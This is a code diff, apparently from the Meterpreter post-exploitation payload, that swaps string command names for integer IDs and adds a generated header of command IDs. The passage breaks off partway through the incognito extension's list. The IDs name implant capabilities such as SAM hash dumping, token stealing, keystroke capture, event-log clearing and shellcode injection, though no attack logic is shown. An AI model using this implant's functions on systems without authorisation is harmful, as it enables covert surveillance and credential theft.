Land #395, Replace METHOD string with COMMAND_ID integer

c/meterpreter/source/common/common.h

@@ -107,5 +107,6 @@ static _inline void real_dprintf(char *format, ...)
 #include "common_pivot_tree.h"
 #include "common_thread.h"
 #include "common_scheduler.h"
+#include "common_command_ids.h"
 
 #endif

c/meterpreter/source/common/common_base.h

@@ -26,33 +26,33 @@ typedef BOOL(*INLINE_DISPATCH_ROUTINE)(Remote *remote, Packet *packet, DWORD* re
 /*! @brief Helper macro which defines an empty dispatch handler. */
 #define EMPTY_DISPATCH_HANDLER NULL, NULL, EMPTY_TLV
 /*! @brief Helper macro that defines terminator for command lists. */
-#define COMMAND_TERMINATOR { NULL, { EMPTY_DISPATCH_HANDLER }, { EMPTY_DISPATCH_HANDLER } }
+#define COMMAND_TERMINATOR { 0, { EMPTY_DISPATCH_HANDLER }, { EMPTY_DISPATCH_HANDLER } }
 
 /*!
  * @brief Helper macro that defines a command instance with a request handler only.
  * @remarks The request handler will be executed on a separate thread.
  */
-#define COMMAND_REQ(name, reqHandler) { name, { reqHandler, NULL, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
+#define COMMAND_REQ(command_id, reqHandler) { command_id, { reqHandler, NULL, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
 /*!
  * @brief Helper macro that defines a command instance with a response handler only.
  * @remarks The request handler will be executed on a separate thread.
  */
-#define COMMAND_REP(name, repHandler) { name, { EMPTY_DISPATCH_HANDLER }, { repHandler, NULL, EMPTY_TLV } }
+#define COMMAND_REP(command_id, repHandler) { command_id, { EMPTY_DISPATCH_HANDLER }, { repHandler, NULL, EMPTY_TLV } }
 /*!
  * @brief Helper macro that defines a command instance with both a request and response handler.
  * @remarks The request handler will be executed on a separate thread.
  */
-#define COMMAND_REQ_REP(name, reqHandler, repHandler) { name, { reqHandler, NULL, EMPTY_TLV }, { repHandler, NULL, EMPTY_TLV } }
+#define COMMAND_REQ_REP(command_id, reqHandler, repHandler) { command_id, { reqHandler, NULL, EMPTY_TLV }, { repHandler, NULL, EMPTY_TLV } }
 /*!
  * @brief Helper macro that defines a command instance with an inline request handler only.
  * @remarks The request handler will be executed on the server thread.
  */
-#define COMMAND_INLINE_REQ(name, reqHandler) { name, { NULL, reqHandler, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
+#define COMMAND_INLINE_REQ(command_id, reqHandler) { command_id, { NULL, reqHandler, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
 /*!
  * @brief Helper macro that defines a command instance with an inline response handler only.
  * @remarks The response handler will be executed on the server thread.
  */
-#define COMMAND_INLINE_REP(name, reqHandler) { name, { EMPTY_DISPATCH_HANDLER }, { NULL, reqHandler, EMPTY_TLV } }
+#define COMMAND_INLINE_REP(command_id, reqHandler) { command_id, { EMPTY_DISPATCH_HANDLER }, { NULL, reqHandler, EMPTY_TLV } }
 
 /*!
  * @brief Defines a command handler for requests and responses.
@@ -82,7 +82,7 @@ typedef struct
  */
 typedef struct command
 {
-	LPCSTR           method;     ///< Identifier for the command.
+	UINT             command_id; ///< Identifier for the command.
 	PacketDispatcher request;    ///< Defines the request handler.
 	PacketDispatcher response;   ///< Defines the response handler.
 

c/meterpreter/source/common/common_channel.h

@@ -18,24 +18,15 @@ typedef enum
 
 // Direct I/O handler -- used in place of internal buffering for channels
 // that can do event based forwarding of buffers.
-typedef DWORD (*DirectIoHandler)(struct _Channel *channel, 
+typedef DWORD (*DirectIoHandler)(struct _Channel *channel, struct _ChannelBuffer *buffer, LPVOID context, ChannelDioMode mode, PUCHAR chunk, ULONG length, PULONG bytesXfered);
-		struct _ChannelBuffer *buffer, LPVOID context, ChannelDioMode mode, 
-		PUCHAR chunk, ULONG length, PULONG bytesXfered);
 
 // Asynchronous completion routines -- used with channel_open, channel_read, 
 // etc.
-typedef DWORD (*ChannelOpenCompletionRoutine)(Remote *remote,
+typedef DWORD (*ChannelOpenCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result);
-		struct _Channel *channel, LPVOID context, DWORD result);
+typedef DWORD (*ChannelReadCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result, PUCHAR buffer, ULONG bytesRead);
-typedef DWORD (*ChannelReadCompletionRoutine)(Remote *remote,
+typedef DWORD (*ChannelWriteCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result, ULONG bytesWritten);
-		struct _Channel *channel, LPVOID context, DWORD result, PUCHAR buffer, 
+typedef DWORD (*ChannelCloseCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result);
-		ULONG bytesRead);
+typedef DWORD (*ChannelInteractCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result);
-typedef DWORD (*ChannelWriteCompletionRoutine)(Remote *remote,
-		struct _Channel *channel, LPVOID context, DWORD result, 
-		ULONG bytesWritten);
-typedef DWORD (*ChannelCloseCompletionRoutine)(Remote *remote,
-		struct _Channel *channel, LPVOID context, DWORD result);
-typedef DWORD (*ChannelInteractCompletionRoutine)(Remote *remote,
-		struct _Channel *channel, LPVOID context, DWORD result);
 
 // Completion routine wrapper context
 typedef struct _ChannelCompletionRoutine
@@ -69,13 +60,9 @@ typedef struct _ChannelBuffer
 typedef struct _NativeChannelOps
 {
 	LPVOID context;
-	DWORD (*write)(struct _Channel *channel, Packet *request,
+	DWORD (*write)(struct _Channel *channel, Packet *request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten);
-			LPVOID context, LPVOID buffer, DWORD bufferSize,
+	DWORD (*close)(struct _Channel *channel, Packet *request, LPVOID context);
-			LPDWORD bytesWritten);
+	DWORD (*interact)(struct _Channel *channel, Packet *request, LPVOID context, BOOLEAN interact);
-	DWORD (*close)(struct _Channel *channel, Packet *request,
-			LPVOID context);
-	DWORD (*interact)(struct _Channel *channel, Packet *request,
-			LPVOID context, BOOLEAN interact);
 } NativeChannelOps;
 
 // Channel operations for a stream-based channel
@@ -94,15 +81,10 @@ typedef struct _DatagramChannelOps
 typedef struct _PoolChannelOps
 {
 	NativeChannelOps native;
-	DWORD (*read)(struct _Channel *channel, Packet *request,
+	DWORD (*read)(struct _Channel *channel, Packet *request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesRead);
-			LPVOID context, LPVOID buffer, DWORD bufferSize,
+	DWORD (*eof)(struct _Channel *channel, Packet *request, LPVOID context, LPBOOL isEof);
-			LPDWORD bytesRead);
+	DWORD (*seek)(struct _Channel *channel, Packet *request, LPVOID context, LONG offset, DWORD whence);
-	DWORD (*eof)(struct _Channel *channel, Packet *request,
+	DWORD (*tell)(struct _Channel *channel, Packet *request, LPVOID context, LPLONG offset);
-			LPVOID context, LPBOOL isEof);
-	DWORD (*seek)(struct _Channel *channel, Packet *request,
-			LPVOID context, LONG offset, DWORD whence);
-	DWORD (*tell)(struct _Channel *channel, Packet *request,
-			LPVOID context, LPLONG offset);
 } PoolChannelOps;
 
 /*

c/meterpreter/source/common/common_command_ids.h

@@ -0,0 +1,233 @@
+/*!
+ * @file common_command_ids.h
+ * @brief Declarations of command ID values
+ * @description This file was generated 2020-05-01 05:24:48 UTC. Do not modify directly.
+ */
+#ifndef _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
+#define _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
+
+#define EXTENSION_ID_CORE 0
+#define EXTENSION_ID_STDAPI 1000
+#define EXTENSION_ID_PRIV 2000
+#define EXTENSION_ID_EXTAPI 3000
+#define EXTENSION_ID_SNIFFER 4000
+#define EXTENSION_ID_WINPMEM 7000
+#define EXTENSION_ID_KIWI 8000
+#define EXTENSION_ID_UNHOOK 10000
+#define EXTENSION_ID_ESPIA 11000
+#define EXTENSION_ID_INCOGNITO 12000
+#define EXTENSION_ID_PYTHON 13000
+#define EXTENSION_ID_POWERSHELL 14000
+#define EXTENSION_ID_LANATTACKS 15000
+#define EXTENSION_ID_PEINJECTOR 16000
+#define EXTENSION_ID_MIMIKATZ 17000
+
+#define COMMAND_ID_CORE_CHANNEL_CLOSE 1
+#define COMMAND_ID_CORE_CHANNEL_EOF 2
+#define COMMAND_ID_CORE_CHANNEL_INTERACT 3
+#define COMMAND_ID_CORE_CHANNEL_OPEN 4
+#define COMMAND_ID_CORE_CHANNEL_READ 5
+#define COMMAND_ID_CORE_CHANNEL_SEEK 6
+#define COMMAND_ID_CORE_CHANNEL_TELL 7
+#define COMMAND_ID_CORE_CHANNEL_WRITE 8
+#define COMMAND_ID_CORE_CONSOLE_WRITE 9
+#define COMMAND_ID_CORE_ENUMEXTCMD 10
+#define COMMAND_ID_CORE_GET_SESSION_GUID 11
+#define COMMAND_ID_CORE_LOADLIB 12
+#define COMMAND_ID_CORE_MACHINE_ID 13
+#define COMMAND_ID_CORE_MIGRATE 14
+#define COMMAND_ID_CORE_NATIVE_ARCH 15
+#define COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION 16
+#define COMMAND_ID_CORE_PATCH_URL 17
+#define COMMAND_ID_CORE_PIVOT_ADD 18
+#define COMMAND_ID_CORE_PIVOT_REMOVE 19
+#define COMMAND_ID_CORE_PIVOT_SESSION_DIED 20
+#define COMMAND_ID_CORE_SET_SESSION_GUID 21
+#define COMMAND_ID_CORE_SET_UUID 22
+#define COMMAND_ID_CORE_SHUTDOWN 23
+#define COMMAND_ID_CORE_TRANSPORT_ADD 24
+#define COMMAND_ID_CORE_TRANSPORT_CHANGE 25
+#define COMMAND_ID_CORE_TRANSPORT_GETCERTHASH 26
+#define COMMAND_ID_CORE_TRANSPORT_LIST 27
+#define COMMAND_ID_CORE_TRANSPORT_NEXT 28
+#define COMMAND_ID_CORE_TRANSPORT_PREV 29
+#define COMMAND_ID_CORE_TRANSPORT_REMOVE 30
+#define COMMAND_ID_CORE_TRANSPORT_SETCERTHASH 31
+#define COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS 32
+#define COMMAND_ID_CORE_TRANSPORT_SLEEP 33
+#define COMMAND_ID_STDAPI_FS_CHDIR 1001
+#define COMMAND_ID_STDAPI_FS_CHMOD 1002
+#define COMMAND_ID_STDAPI_FS_DELETE_DIR 1003
+#define COMMAND_ID_STDAPI_FS_DELETE_FILE 1004
+#define COMMAND_ID_STDAPI_FS_FILE_COPY 1005
+#define COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH 1006
+#define COMMAND_ID_STDAPI_FS_FILE_MOVE 1007
+#define COMMAND_ID_STDAPI_FS_GETWD 1008
+#define COMMAND_ID_STDAPI_FS_LS 1009
+#define COMMAND_ID_STDAPI_FS_MD5 1010
+#define COMMAND_ID_STDAPI_FS_MKDIR 1011
+#define COMMAND_ID_STDAPI_FS_MOUNT_SHOW 1012
+#define COMMAND_ID_STDAPI_FS_SEARCH 1013
+#define COMMAND_ID_STDAPI_FS_SEPARATOR 1014
+#define COMMAND_ID_STDAPI_FS_SHA1 1015
+#define COMMAND_ID_STDAPI_FS_STAT 1016
+#define COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE 1017
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE 1018
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES 1019
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT 1020
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY 1021
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES 1022
+#define COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE 1023
+#define COMMAND_ID_STDAPI_NET_RESOLVE_HOST 1024
+#define COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS 1025
+#define COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN 1026
+#define COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN 1027
+#define COMMAND_ID_STDAPI_RAILGUN_API 1028
+#define COMMAND_ID_STDAPI_RAILGUN_API_MULTI 1029
+#define COMMAND_ID_STDAPI_RAILGUN_MEMREAD 1030
+#define COMMAND_ID_STDAPI_RAILGUN_MEMWRITE 1031
+#define COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS 1032
+#define COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY 1033
+#define COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY 1034
+#define COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY 1035
+#define COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE 1036
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY 1037
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT 1038
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE 1039
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT 1040
+#define COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY 1041
+#define COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY 1042
+#define COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY 1043
+#define COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS 1044
+#define COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE 1045
+#define COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT 1046
+#define COMMAND_ID_STDAPI_REGISTRY_SET_VALUE 1047
+#define COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT 1048
+#define COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY 1049
+#define COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST 1050
+#define COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN 1051
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETENV 1052
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS 1053
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETSID 1054
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETUID 1055
+#define COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME 1056
+#define COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF 1057
+#define COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN 1058
+#define COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO 1059
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR 1060
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE 1061
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS 1062
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST 1063
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN 1064
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_READ 1065
+#define COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS 1066
+#define COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH 1067
+#define COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE 1068
+#define COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE 1069
+#define COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO 1070
+#define COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES 1071
+#define COMMAND_ID_STDAPI_SYS_PROCESS_GETPID 1072
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES 1073
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS 1074
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD 1075
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD 1076
+#define COMMAND_ID_STDAPI_SYS_PROCESS_KILL 1077
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE 1078
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE 1079
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK 1080
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT 1081
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY 1082
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ 1083
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK 1084
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE 1085
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE 1086
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE 1087
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS 1088
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN 1089
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS 1090
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME 1091
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS 1092
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND 1093
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE 1094
+#define COMMAND_ID_STDAPI_SYS_PROCESS_WAIT 1095
+#define COMMAND_ID_STDAPI_UI_DESKTOP_ENUM 1096
+#define COMMAND_ID_STDAPI_UI_DESKTOP_GET 1097
+#define COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT 1098
+#define COMMAND_ID_STDAPI_UI_DESKTOP_SET 1099
+#define COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD 1100
+#define COMMAND_ID_STDAPI_UI_ENABLE_MOUSE 1101
+#define COMMAND_ID_STDAPI_UI_GET_IDLE_TIME 1102
+#define COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 1103
+#define COMMAND_ID_STDAPI_UI_SEND_KEYEVENT 1104
+#define COMMAND_ID_STDAPI_UI_SEND_KEYS 1105
+#define COMMAND_ID_STDAPI_UI_SEND_MOUSE 1106
+#define COMMAND_ID_STDAPI_UI_START_KEYSCAN 1107
+#define COMMAND_ID_STDAPI_UI_STOP_KEYSCAN 1108
+#define COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP 1109
+#define COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD 1110
+#define COMMAND_ID_STDAPI_WEBCAM_GET_FRAME 1111
+#define COMMAND_ID_STDAPI_WEBCAM_LIST 1112
+#define COMMAND_ID_STDAPI_WEBCAM_START 1113
+#define COMMAND_ID_STDAPI_WEBCAM_STOP 1114
+#define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115
+#define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116
+#define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117
+#define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001
+#define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002
+#define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003
+#define COMMAND_ID_PRIV_FS_GET_FILE_MACE 2004
+#define COMMAND_ID_PRIV_FS_SET_FILE_MACE 2005
+#define COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE 2006
+#define COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES 2007
+#define COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY 3001
+#define COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA 3002
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP 3003
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE 3004
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE 3005
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME 3006
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START 3007
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP 3008
+#define COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA 3009
+#define COMMAND_ID_EXTAPI_NTDS_PARSE 3010
+#define COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY 3011
+#define COMMAND_ID_EXTAPI_SERVICE_CONTROL 3012
+#define COMMAND_ID_EXTAPI_SERVICE_ENUM 3013
+#define COMMAND_ID_EXTAPI_SERVICE_QUERY 3014
+#define COMMAND_ID_EXTAPI_WINDOW_ENUM 3015
+#define COMMAND_ID_EXTAPI_WMI_QUERY 3016
+#define COMMAND_ID_SNIFFER_CAPTURE_DUMP 4001
+#define COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ 4002
+#define COMMAND_ID_SNIFFER_CAPTURE_RELEASE 4003
+#define COMMAND_ID_SNIFFER_CAPTURE_START 4004
+#define COMMAND_ID_SNIFFER_CAPTURE_STATS 4005
+#define COMMAND_ID_SNIFFER_CAPTURE_STOP 4006
+#define COMMAND_ID_SNIFFER_INTERFACES 4007
+#define COMMAND_ID_WINPMEM_DUMP_RAM 7001
+#define COMMAND_ID_KIWI_EXEC_CMD 8001
+#define COMMAND_ID_UNHOOK_PE 10001
+#define COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN 11001
+#define COMMAND_ID_INCOGNITO_ADD_GROUP_USER 12001
+#define COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER 12002
+#define COMMAND_ID_INCOGNITO_ADD_USER 12003
+#define COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN 12004
+#define COMMAND_ID_INCOGNITO_LIST_TOKENS 12005
+#define COMMAND_ID_INCOGNITO_SNARF_HASHES 12006
+#define COMMAND_ID_PYTHON_EXECUTE 13001
+#define COMMAND_ID_PYTHON_RESET 13002
+#define COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD 14001
+#define COMMAND_ID_POWERSHELL_EXECUTE 14002
+#define COMMAND_ID_POWERSHELL_SESSION_REMOVE 14003
+#define COMMAND_ID_POWERSHELL_SHELL 14004
+#define COMMAND_ID_LANATTACKS_ADD_TFTP_FILE 15001
+#define COMMAND_ID_LANATTACKS_DHCP_LOG 15002
+#define COMMAND_ID_LANATTACKS_RESET_DHCP 15003
+#define COMMAND_ID_LANATTACKS_RESET_TFTP 15004
+#define COMMAND_ID_LANATTACKS_SET_DHCP_OPTION 15005
+#define COMMAND_ID_LANATTACKS_START_DHCP 15006
+#define COMMAND_ID_LANATTACKS_START_TFTP 15007
+#define COMMAND_ID_LANATTACKS_STOP_DHCP 15008
+#define COMMAND_ID_LANATTACKS_STOP_TFTP 15009
+#define COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE 16001
+#define COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND 17001
+
+#endif

c/meterpreter/source/common/common_core.h

@@ -99,7 +99,7 @@ typedef DWORD TlvMetaType;
 typedef enum
 {
 	TLV_TYPE_ANY                 = TLV_VALUE(TLV_META_TYPE_NONE,        0),   ///! Represents an undefined/arbitrary value.
-	TLV_TYPE_METHOD              = TLV_VALUE(TLV_META_TYPE_STRING,      1),   ///! Represents a method/function name value.
+	TLV_TYPE_COMMAND_ID          = TLV_VALUE(TLV_META_TYPE_UINT,        1),   ///! Represents a command identifier.
 	TLV_TYPE_REQUEST_ID          = TLV_VALUE(TLV_META_TYPE_STRING,      2),   ///! Represents a request identifier value.
 	TLV_TYPE_EXCEPTION           = TLV_VALUE(TLV_META_TYPE_GROUP,       3),   ///! Represents an exception value.
 	TLV_TYPE_RESULT              = TLV_VALUE(TLV_META_TYPE_UINT,        4),   ///! Represents a result value.
@@ -234,7 +234,7 @@ typedef struct _DECOMPRESSED_BUFFER
 
 /*! * @brief Packet request completion notification handler function pointer type. */
 typedef DWORD (*PacketRequestCompletionRoutine)(Remote *remote,
-		Packet *response, LPVOID context, LPCSTR method, DWORD result);
+		Packet *response, LPVOID context, UINT commandId, DWORD result);
 
 typedef struct _PacketRequestCompletion
 {

c/meterpreter/source/common/common_metapi.h

@@ -117,7 +117,7 @@ typedef struct _PacketApi
 	DWORD(*transmit_empty_response)(Remote* remote, Packet* packet, DWORD res);
 	DWORD(*transmit_response)(DWORD result, Remote* remote, Packet* response);
 	PCHAR(*get_tlv_value_string)(Packet* packet, TlvType type);
-	Packet*(*create)(PacketTlvType type, LPCSTR method);
+	Packet*(*create)(PacketTlvType type, UINT commandId);
 	Packet*(*create_group)();
 	Packet*(*create_response)(Packet* request);
 	PacketTlvType(*get_type)(Packet* packet);

c/meterpreter/source/extensions/espia/espia.c

@@ -14,8 +14,8 @@ MetApi* met_api = NULL;
 
 Command customCommands[] =
 {
-	COMMAND_REQ( "espia_image_get_dev_screen", request_image_get_dev_screen ),
+    COMMAND_REQ(COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN, request_image_get_dev_screen),
-	COMMAND_TERMINATOR
+    COMMAND_TERMINATOR
 };
 
 /*!
@@ -44,15 +44,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "espia", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/extapi/extapi.c

@@ -22,22 +22,22 @@ MetApi* met_api = NULL;
 /*! @brief List of commands that the extended API extension providers. */
 Command customCommands[] =
 {
-	COMMAND_REQ("extapi_window_enum", request_window_enum),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_WINDOW_ENUM, request_window_enum),
-	COMMAND_REQ("extapi_service_enum", request_service_enum),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_SERVICE_ENUM, request_service_enum),
-	COMMAND_REQ("extapi_service_query", request_service_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_SERVICE_QUERY, request_service_query),
-	COMMAND_REQ("extapi_service_control", request_service_control),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_SERVICE_CONTROL, request_service_control),
-	COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA, request_clipboard_get_data),
-	COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA, request_clipboard_set_data),
-	COMMAND_REQ("extapi_clipboard_monitor_start", request_clipboard_monitor_start),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START, request_clipboard_monitor_start),
-	COMMAND_REQ("extapi_clipboard_monitor_pause", request_clipboard_monitor_pause),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE, request_clipboard_monitor_pause),
-	COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME, request_clipboard_monitor_resume),
-	COMMAND_REQ("extapi_clipboard_monitor_purge", request_clipboard_monitor_purge),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE, request_clipboard_monitor_purge),
-	COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP, request_clipboard_monitor_stop),
-	COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP, request_clipboard_monitor_dump),
-	COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY, request_adsi_domain_query),
-	COMMAND_REQ("extapi_ntds_parse", ntds_parse),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_NTDS_PARSE, ntds_parse),
-	COMMAND_REQ("extapi_wmi_query", request_wmi_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_WMI_QUERY, request_wmi_query),
-	COMMAND_REQ("extapi_pageant_send_query", request_pageant_send_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY, request_pageant_send_query),
 	COMMAND_TERMINATOR
 };
 
@@ -70,15 +70,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "extapi", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/incognito/incognito.c

@@ -203,12 +203,12 @@ cleanup:
 
 Command customCommands[] =
 {
-	COMMAND_REQ( "incognito_list_tokens", request_incognito_list_tokens ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_LIST_TOKENS, request_incognito_list_tokens ),
-	COMMAND_REQ( "incognito_impersonate_token", request_incognito_impersonate_token ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN, request_incognito_impersonate_token ),
-	COMMAND_REQ( "incognito_add_user", request_incognito_add_user ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_ADD_USER, request_incognito_add_user ),
-	COMMAND_REQ( "incognito_add_group_user", request_incognito_add_group_user ),
